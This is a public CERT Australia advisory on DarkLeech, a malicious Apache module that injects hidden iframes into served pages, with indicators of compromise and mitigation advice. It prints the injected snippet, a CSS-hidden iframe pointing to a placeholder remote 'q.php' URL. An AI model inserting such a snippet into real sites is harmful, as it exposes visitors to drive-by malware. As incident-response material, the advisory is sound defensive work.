WHITE
CERT Australia has received multiple reports of compromised web servers that have had a malicious module added to the Apache HTTP Server installation.
The malicious module causes dynamic content to be injected into random web pages or JavaScript files served on any domains handled by the
Apache installation.
This publication is provided for the situational awareness of partners and to assist businesses with detection, recovery and mitigation.
This document remains the property of the Australian Government. The information contained in this document is for the use of the intended recipient only and may contain confidential or privileged information. If this document has been received in error, that error does not constitute a waiver of any confidentiality, privilege or copyright in respect of this document or the information it contains. This document and the information contained herein cannot be disclosed, disseminated or reproduced in any manner whatsoever without prior written permission from the Assistant Secretary, CERT Australia,
Attorney-General's Department, 3 - 5 National Circuit, Barton ACT 2600.
The material and information in this document is general information only and is not intended to be advice. The material and information is not adapted to any particular person’s circumstances and therefore cannot be relied upon to be of assistance in any particular case. You should base any action you take exclusively on your own methodologies, assessments and judgement, after seeking specific advice from such relevant experts and advisers as you consider necessary or desirable. To the extent permitted by law, the Australian Government has no liability to you in respect of damage that you might suffer that is directly or indirectly related to this document, no matter how arising (including as a result of negligence).
WHITE
WHITE
CA-2013-19
This bulletin is designated WHITE. WHITE Alerts are not confidential. They contain information that is for public, unrestricted dissemination, publication, web-posting or broadcast. You may publish the information, subject to copyright and any restrictions or rights noted in the information.
The Apache HTTP Server (Apache) is a free and open-source web server widely deployed on the World
Wide Web (WWW) and internal networks. It is estimated that approximately 65% of all active websites on the Internet are serviced by Apache. A single Apache instance may serve content for a large number of individual domains in a feature known as “shared hosting”.
The architecture of Apache allows for the inclusion of compiled plugin modules which extend the server’s functionality in a variety of ways, and typically a number of modules are included with standard installations.
CERT Australia has become aware of a number of compromised servers that have had one or more malicious modules added to the Apache configuration. The malicious module(s) insert additional HTML or
JavaScript in to some served pages that cause client systems to invisibly download content from remote sites. The remote content typically includes exploit code designed to install malicious software on those computers.
As part of its normal activity CERT Australia receives information from a variety of sources regarding compromised web sites and sends email to the domain operators to notify them of the incident. CERT
Australia has provided advice to a large number of website operators in the past two weeks that have, as part of the compromise, had one or more malicious modules installed in their Apache web server installation. The module implements relatively sophisticated techniques to avoid being detected by server operators and security researchers or scanning tools.
The malicious module, known as DarkLeech by its author, takes the form of a compiled dynamic shared object and has been observed in both Redhat- and Debian-derived Linux distributions. The module performs a number of steps to validate the visitor in determining whether to display the injected content, including checking the cookies, user-agent, IP address and its internal block-lists. In one version of the code the malicious content was shown to a given IP address only once every seven days, and automatically blacklists ip addresses from administrative users, making an examination of the site by security staff or scanning tools problematic.
The code injected into the site typically takes a form similar to the text below:
<style>.n93vw8rp {position: absolute left: -1478px; top:-1112px} </style> <div class=”n93vw8rp”> <iframe src=”http://<IP address or Domain>/<random 32char string>/q.php
” width=”519” height=”517”</iframe></div></style>
WHITE
CA-2013-19
WHITE
CA-2013-19
In the code, the Cascading Style Sheet class name, positioning, IFRAME size, random string and IP or domain are all variable. When injected into a site’s included JavaScript files, the code is wrapped in a “document.write()” method.
While some minor variation on this style has been observed, all follow a similar pattern to the code above and all injections seen by CERT Australia have used the “q.php” file in the URL.
There are several files on the systems which may confirm compromise by the DarkLeech malware.
Temporary files
DarkLeech stores temporary files in the system’s /var/tmp directory. These files are known to contain a variety of information regarding banned IP’s. The files take the following format: sess_<32 character random character string>
Module location
There are a variety of locations where the Apache HTTP Server may store modules, though each distribution ordinarily limits this to a small number of directories. It is possible for an administrator or malicious actor to include modules from other locations so incident responders should be aware of the locations utilised by a particular server’s installation.
For example, it is common for the following distribution types to use the following folders to store or link to modules:
Redhat-derived distributions
/usr/lib64/httpd/modules
/usr/lib/
/lib64/
Debian-derived distributions
/usr/lib/apache2/modules
/etc/apache2/mods-available
/etc/apache2/mods-enabled
Additionally, CERT Australia has observed several cases where a “LoadModule” directive has been inserted into a configuration file located in /etc/httpd/conf.d/ or /etc/apache2/conf.d/ directory which loads the DarkLeech module during server start-up.
Identification and verification of the malicious module’s origin can be made by utilising the distribution’s package management tools (such as “rpm” or “dpkg”). Quarantining of the module(s) and removal of the references from configuration files will prevent further malicious code insertions by DarkLeech . Some files have been observed to make use of the filesystem’s extended attributes to prevent deletion and would need to be modified for successful removal.
WHITE
CA-2013-19
WHITE
CA-2013-19
Other compromised files and services
CERT Australia has received reports that other packages on affected systems have also been compromised, including a number of binaries related to the Secure Shell (SSH) services. Additionally, generic PHP backdoors have also been reported and thus incident responders need to be aware that a malicious Apache module is unlikely to be the only unauthorised file on the system. Depending on the level of compromise, detection of malicious artefacts may only be possible by examining the filesystem when offline.
Although the method of initial compromise related to the DarkLeech module is not currently known,
CERT Australia suggests that partners consider the following specific mitigations to protect against this cyber security risk:
Update Operating System, Apache Server and Content Management System software to the latest version or patch levels;
Make use of system file integrity and Rootkit monitoring tools;
Conduct remote website monitoring for detection of injected code;
Consider utilising data backups to recover the system on a new Operating System installation.
After system recovery and mitigation has taken place, change operating system, application and user passwords from a computer system known to be free of malicious software.
Please contact CERT Australia for YARA or CLAMAV detection signatures.
WHITE
CA-2013-19
WHITE
CA-2013-19
CERT Australia suggests that partners consider the following general mitigations to protect against this and other cyber security risks:
Use application white-listing to only allow specifically authorised applications to operate on networks. This mitigation helps prevent malicious software or unauthorised applications from executing.
Ensure that applications and operating systems are kept up-to-date with the latest software patches.
Ensure that users are restricted from, or are administratively prohibited from installing unauthorised software and browsing the internet with administrator privileges.
Remove, disable, or rename any default system accounts wherever possible.
Enforce strong passphrase policies to reduce the risk from brute forcing attempts.
Implement account lockout policies to reduce the risk from brute forcing attempts.
Monitor the creation of administrator level accounts by third-party vendors.
Monitor intrusion detection and/or prevention systems, user logs and server logs for suspicious behaviour.
Use defence-in-depth methods in system design to restrict and control access to individual products and control networks.
Take measures to minimise network exposure for all control system devices. Critical devices should not be directly exposed to the internet. Locate control system networks and remote devices behind firewalls and isolate them from the business network.
When remote access is required, use secure methods such as Virtual Private Networks (VPNs) with two factor authentication.
Ensure that computer systems are running antivirus software with the latest antivirus signatures.
If infected, review your antivirus software specific removal guidelines for the malware.
For other mitigation please refer to the “Strategies to mitigate targeted electronic intrusions” publication. [1]
Please contact CERT Australia on 1300 172 499 or info@cert.gov.au
if you observe activity corresponding to this publication, or if you have any questions concerning the publication, its content or its application.
[1] https://www.cert.gov.au/advisories
http://blog.unmaskparasites.com/2012/09/10/malicious-apache-module-injects-iframes/
http://blog.sucuri.net/2013/02/web-server-compromise-debian-distro-identify-and-remove-corruptapache-modules.html
WHITE
CA-2013-19
WHITE
CA-2013-19
CERT Australia is interested in any feedback you may have with respect to this update and/or the service we provide. Please email info@cert.gov.au
or call 1300 172 499 , if you would like to provide us with any comments.
NOTE: Organisations need to consider the sensitivity of information sent to this email address as it will be
‘in the clear’ and not secure. If needed, secure communication channels for sensitive or incident related information are available on request.
Partners observing any activity connected to this publication are requested to contact CERT Australia at info@cert.gov.au or 1300 172 499. This information is used to form an understanding of Australia’s cyber threat context. All information is handled internal to the CERT and in strict confidence. Secure communications mechanisms are available on request.
CERT Australia’s primary responsibility is to develop close working relationships with critical infrastructure organisations and businesses that operate systems that are important to Australia’s national interest. In this way, CERT Australia is able to help ensure that important services all Australians rely on in their daily lives, are secure and resilient.
In addition to any internal or regulatory requirements that may be in place, CERT Australia partners can report cyber threats and incidents to CERT Australia on 1300 172 499 . This telephone number assists
CERT Australia to rapidly respond to incidents impacting those services that are critical to all Australians.
Cyber crime involves the unauthorised access to or impairment of computer systems and is likely to constitute an offence under the Commonwealth’s Criminal Code Act 1995 and/or state and territory criminal laws. If CERT Australia partners suspect they have been the victim of cyber crime they should report it to the Australian Federal Police.
WHITE
CA-2013-19
RED
AMBER
GREEN
WHITE
NOT CLASSIFIED
Highly Restricted
Access to and use by your CERT Australia Security Contact
Officer only.
You must ensure that your CERT Australia Security Contact Officer does not disseminate or discuss the information with any other person, and you shall ensure that you have appropriate systems in place to ensure that the information cannot be accessed or used by any person other than your CERT Australia Security Contact Officer.
Restricted internal access and use only.
Subject to the below, you shall only make ‘AMBER’ Alerts available to your employees on a “needs to know basis” strictly for your internal purposes only to assist in the protection of your information and communications technology (ICT) systems.
In some instances you may be provided with ‘AMBER’ Alerts which are marked to allow you to also disclose it to your contractors or agents on a “needs to know basis” strictly for your internal purposes only to assist in the protection of your ICT systems.
Restricted to closed groups and subject to confidentiality
You may share ‘GREEN’ Alerts with external organisations, information exchanges or individuals in the network security, information assurance or critical network infrastructure community that agree to maintain the confidentiality of the information in the
Alert.
You may not publish or post on the World Wide Web or otherwise release it in circumstances where confidentiality may not be maintained.
Not restricted
‘WHITE’ Alerts are not confidential. They contain information that is for public, unrestricted dissemination, publication, web-posting or broadcast. You may publish the information, subject to copyright and any restrictions or rights noted in the information.
Any information received from CERT Australia that is not classified in accordance with the Traffic Light Protocol must be treated as
‘AMBER’ classified information unless otherwise agreed in writing by the AttorneyGeneral’s Department.